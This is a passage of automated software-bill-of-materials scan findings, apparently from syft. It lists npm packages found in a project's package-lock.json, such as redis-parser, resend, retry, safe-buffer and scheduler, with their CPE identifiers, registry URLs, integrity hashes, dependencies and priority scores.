cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/redis-parser@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz integrity: sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A== dependencies: redis-errors: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 73e41b20b413651d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: rentaldrivego 1.0.0' title: rentaldrivego 1.0.0 description: 'Package discovered: rentaldrivego 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 784a87ea0f6f2516 name: rentaldrivego version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/rentaldrivego@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7ebb1ff31601df05 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: require-directory 2.1.1' title: require-directory 2.1.1 description: 'Package discovered: require-directory 2.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ae03eb850b2a6844 name: require-directory version: 2.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/require-directory@2.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz integrity: sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ae7e8898d2f0d0c8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: require-from-string 2.0.2' title: require-from-string 2.0.2 description: 'Package discovered: require-from-string 2.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f7f7aa302949d36c name: require-from-string version: 2.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/require-from-string@2.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2d09a802d546535f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: require-main-filename 2.0.0' title: require-main-filename 2.0.0 description: 'Package discovered: require-main-filename 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 791f53dc42a97604 name: require-main-filename version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/require-main-filename@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz integrity: sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b3700e9b1b03966b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: resend 3.5.0' title: resend 3.5.0 description: 'Package discovered: resend 3.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c52cdc280efaa4d0 name: resend version: 3.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/resend@3.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/resend/-/resend-3.5.0.tgz integrity: sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ== dependencies: '@react-email/render': 0.0.16 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7be6d0329d7fce71 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: resolve 1.22.12' title: resolve 1.22.12 description: 'Package discovered: resolve 1.22.12' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2e445c7ed78482c1 name: resolve version: 1.22.12 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/resolve@1.22.12 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz integrity: sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA== dependencies: es-errors: ^1.3.0 is-core-module: ^2.16.1 path-parse: ^1.0.7 supports-preserve-symlinks-flag: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3f98609d8855980b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: restructure 3.0.2' title: restructure 3.0.2 description: 'Package discovered: restructure 3.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 05272d1e7e2ad4be name: restructure version: 3.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/restructure@3.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz integrity: sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b7f5c38e4c9ed33f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: retry 0.13.1' title: retry 0.13.1 description: 'Package discovered: retry 0.13.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b8be0fab008ab183 name: retry version: 0.13.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/retry@0.13.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/retry/-/retry-0.13.1.tgz integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b8976a72aaa61b4d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: retry-request 7.0.2' title: retry-request 7.0.2 description: 'Package discovered: retry-request 7.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 672814322994feff name: retry-request version: 7.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/retry-request@7.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz integrity: sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w== dependencies: '@types/request': ^2.48.8 extend: ^3.0.2 teeny-request: ^9.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0d600ce535ab6bd3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: reusify 1.1.0' title: reusify 1.1.0 description: 'Package discovered: reusify 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 456353a253e18966 name: reusify version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/reusify@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz integrity: sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3a557f6b562fa305 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: run-parallel 1.2.0' title: run-parallel 1.2.0 description: 'Package discovered: run-parallel 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ca5a4d8be889885f name: run-parallel version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/run-parallel@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz integrity: sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA== dependencies: queue-microtask: ^1.2.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0d59c1e836c63d4a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: safe-buffer 5.1.2' title: safe-buffer 5.1.2 description: 'Package discovered: safe-buffer 5.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 36d9a8484ed180a6 name: safe-buffer version: 5.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/safe-buffer@5.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz integrity: sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 982541a2a19fdc52 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: safe-buffer 5.2.1' title: safe-buffer 5.2.1 description: 'Package discovered: safe-buffer 5.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 28135efb01cb74b9 name: safe-buffer version: 5.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/safe-buffer@5.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 186ed2340219a99c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: safer-buffer 2.1.2' title: safer-buffer 2.1.2 description: 'Package discovered: safer-buffer 2.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bc8acb243e9d9464 name: safer-buffer version: 2.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/safer-buffer@2.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2ab87631c01bfc3f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: scheduler 0.17.0' title: scheduler 0.17.0 description: 'Package discovered: scheduler 0.17.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e689757d7bf8470d name: scheduler version: 0.17.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/scheduler@0.17.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz integrity: sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA== dependencies: loose-envify: ^1.1.0 object-assign: ^4.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bbbd7dd6a8a5a506 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: scheduler 0.23.2' title: scheduler 0.23.2 description: 'Package discovered: scheduler 0.23.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d0ebbd8a4bc7ada1 name: scheduler version: 0.23.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/scheduler@0.23.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz integrity: sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ== dependencies: loose-envify: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 613adae5df8a79db ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: scmp 2.1.0' title: scmp 2.1.0 description: 'Package discovered: scmp 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 607830ce210254e3 name: scmp version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/scmp@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz integrity: sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q== dependencies: null compliance: 